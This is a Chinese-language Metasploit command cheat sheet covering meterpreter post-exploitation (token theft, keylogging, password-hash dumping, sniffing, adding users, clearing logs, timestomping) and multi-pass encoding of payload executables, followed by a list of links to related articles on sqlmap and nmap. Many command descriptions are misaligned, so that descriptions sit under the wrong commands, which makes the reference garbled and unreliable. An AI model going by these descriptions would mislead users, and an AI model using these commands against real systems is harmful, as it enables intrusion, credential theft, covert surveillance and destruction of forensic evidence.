Metasploit 常用滲透命令大全

show exploits
查找metasploit框架中所有的其他模塊。
info
你本地可以讓目標(biāo)主機連接的IP地址,通常當(dāng)目標(biāo)主機不在同一個局域網(wǎng)內(nèi)時,就需要是一個公共IP地址,特別為反彈式shell使用。
RHOST
遠(yuǎn)程主機或是目標(biāo)主機。
set function
設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機參數(shù))。
setg function
以全局方式設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機參數(shù))。
show options
指定你所知道的目標(biāo)的操作系統(tǒng)以及補丁版本類型。
set payload name
列出所有高級配置選項。
set autorunscript migrate -f.
列出exploit命令的幫助信息。
sessions -l
列出可用的交互會話(在處理多個shell時使用)。
sessions -l -v
在所有活躍的metasploit會話中運行一個特定的metasploit腳本。
sessions -K
終止所有活躍的交互會話。
sessions -c cmd
在所有活躍的metasploit會話上執(zhí)行一個命令。
sessions -u sessionID
升級一個普通的win32 shell到metasploit shell。
db_create name
利用nmap并把掃描數(shù)據(jù)存儲到數(shù)據(jù)庫中(支持普通的nmap語句,EG:-sT -v -P0)。
db_autopwn -h
展示出db_autopwn命令的幫助信息。
db_autopwn -p -r -e
刪除當(dāng)前數(shù)據(jù)庫。
db_destroy user:passwd@host:port/database
使用高級選項來刪除數(shù)據(jù)庫。
***metasploit命令***
help
打開meterpreter使用幫助。
run scriptname
運行meterpreter腳本,在scripts/meterpreter目錄下可以查看到所有腳本名。
sysinfo
列出受控主機的系統(tǒng)信息。
ls
列出目標(biāo)主機的文件和文件夾信息。
use priv
加載特權(quán)提升擴展模塊,來擴展metasploit庫。
ps
顯示所有運行的進程以及相關(guān)聯(lián)的用戶賬戶。
migrate PID
遷移到一個指定的進程ID(PID號可通過ps命令從主機上獲得)。
use incognito
加載incognito功能(用來盜竊目標(biāo)主機的令牌或假冒用戶)
list_tokens -u
列出目標(biāo)主機用戶的可用令牌。
list_tokens -g
列出目標(biāo)主機用戶組的可用令牌。
impersonate_token DOMAIN_NAME\USERNAME
假冒目標(biāo)主機上的可用令牌。
steal_token PID
停止假冒當(dāng)前令牌。
getsystem
執(zhí)行cmd.exe命令并進行交互。
execute -f cmd.exe -i -t
以所有可用令牌來執(zhí)行cmd命令并隱藏該進程。
rev2self
回到控制目標(biāo)主機的初始用戶賬戶下。
reg command
在目標(biāo)主機注冊表中進行交互,創(chuàng)建,刪除,查詢等操作。
setdesktop number
切換到另一個用戶界面(該功能基于那些用戶已登錄)。
screenshot
對目標(biāo)主機的屏幕進行截圖。
upload file
向目標(biāo)主機上傳文件。
download file
從目標(biāo)主機下載文件。
keyscan_start
針對遠(yuǎn)程目標(biāo)主機開啟鍵盤記錄功能。
keyscan_dump
存儲目標(biāo)主機上捕獲的鍵盤記錄。
keyscan_stop
停止針對目標(biāo)主機的鍵盤記錄。
getprivs
盡可能多的獲取目標(biāo)主機上的特權(quán)。
uictl enable keyboard/mouse
接管目標(biāo)主機的鍵盤和鼠標(biāo)。
background
將你當(dāng)前的metasploit shell轉(zhuǎn)為后臺執(zhí)行。
hashdump
導(dǎo)出目標(biāo)主機中的口令哈希值。
use sniffer
加載嗅探模式。
sniffer_interfaces
列出目標(biāo)主機所有開放的網(wǎng)絡(luò)端口。
sniffer_dump interfaceID pcapname
在目標(biāo)主機上啟動嗅探。
sniffer_start interfaceID packet-buffer
在目標(biāo)主機上針對特定范圍的數(shù)據(jù)包緩沖區(qū)啟動嗅探。
sniffer_stats interfaceID
獲取正在實施嗅探網(wǎng)絡(luò)接口的統(tǒng)計數(shù)據(jù)。
sniffer_stop interfaceID
停止嗅探。
add_user username password -h ip
在遠(yuǎn)程目標(biāo)主機上添加一個用戶。
clearev
清楚目標(biāo)主機上的日志記錄。
timestomp
修改文件屬性,例如修改文件的創(chuàng)建時間(反取證調(diào)查)。
reboot
重啟目標(biāo)主機。
***MSFpayload命令***
msfpayload -h
msfpayload的幫助信息。
msfpayload windows/meterpreter/bind_tcp O
mefencode -h
列出msfencode的幫助命令。
msfencode -l
列出所有可用的編碼器。
msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
顯示編碼緩沖區(qū)的格式。
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
使用shikata_ga_nai編碼器對payload.raw文件進行5編碼,然后導(dǎo)出一個名為encoded_payload.exe的文件。
msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
創(chuàng)建一個純字母數(shù)字的shellcode,由ESI寄存器只想shellcode,以C語言格式輸出。
***MSFcli命令***
msfcli | grep exploit
相關(guān)文章
- 一個自動化的SQL注入工具,其主要功能是掃描、發(fā)現(xiàn)并利用給定URL的SQL注入漏洞,內(nèi)置了很多繞過插件,支持的數(shù)據(jù)庫是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server2023-02-04
- Nmap是一款網(wǎng)絡(luò)掃描和主機檢測的非常有用的工具。Nmap是不局限于僅僅收集信息和枚舉,同時可以用來作為一個漏洞探測器或安全掃描器。它可以適用于winodws,linux,mac等操作2019-03-16
SQLMAP注入檢查方法 11種常見SQLMAP使用方法詳解
sqlmap也是滲透中常用的一個注入工具,其實在注入工具方面,很多人都是通過這個工具實施的檢測與注入,對于我們從事安全防御的人來說,一定要引起注意,一般的程序員寫的代2018-08-16- 這篇文章主要介紹了lcx用法之心得總結(jié),需要的朋友可以參考下2017-09-06
lcx端口轉(zhuǎn)發(fā)詳細(xì)介紹及使用方法(lcx內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢)
這篇文章主要介紹了lcx端口轉(zhuǎn)發(fā)詳細(xì)介紹及使用方法(lcx內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢),需要的朋友可以參考下2017-09-06- 這是我們的Nmap備忘單的第四部分,本文中我們將討論更多東西關(guān)于掃描防火墻,IDS / IPS 逃逸,Web服務(wù)器滲透測試等。在此之前,我們應(yīng)該了解一下防火墻的一些基礎(chǔ)知識以便2016-12-27
- 眾所周知NMAP是經(jīng)常用來進行端口發(fā)現(xiàn)、端口識別。除此之外我們還可以通過NMAP的NSE腳本做很多事情,比如郵件指紋識別,檢索WHOIS記錄,使用UDP服務(wù)等2016-12-27
- 這是我們的第二期NMAP備忘單,基本上,我們將討論一些高級NMAP掃描的技術(shù),我們將進行一個中間人攻擊(MITM)?,F(xiàn)在,游戲開始了2016-12-27
- nmap是一個網(wǎng)絡(luò)連接端掃描軟件,用來掃描網(wǎng)上電腦開放的網(wǎng)絡(luò)連接端。確定哪些服務(wù)運行在哪些連接端,并且推斷計算機運行哪個操作系統(tǒng)(這是亦稱 fingerprinting)。它是網(wǎng)2016-12-27
網(wǎng)絡(luò)漏洞掃描工具Acunetix Web Vulnerability Scanner(AWVS)使用介紹
Acunetix Web Vulnerability Scanner(簡稱AWVS)是一款知名的網(wǎng)絡(luò)漏洞掃描工具,它通過網(wǎng)絡(luò)爬蟲測試你的網(wǎng)站安全,檢測流行安全漏洞。倫敦時間2015年6月24日,官方發(fā)布了2016-09-28